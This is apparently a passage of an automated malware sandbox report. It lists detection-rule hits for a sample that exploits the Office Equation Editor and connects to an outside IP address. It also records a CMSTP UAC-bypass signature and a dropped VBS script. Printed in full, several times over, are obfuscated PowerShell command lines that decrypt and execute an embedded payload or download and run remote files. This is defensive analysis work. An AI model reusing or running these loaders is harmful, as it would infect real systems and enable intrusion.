            8.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:
            Click to see the 15 entries

            Exploits

            barindex
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.45.34, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 428, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 428, TargetFilename: C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 428, Protocol: tcp, SourceIp: 104.168.45.34, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3220, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 3460, ProcessName: wscript.exe
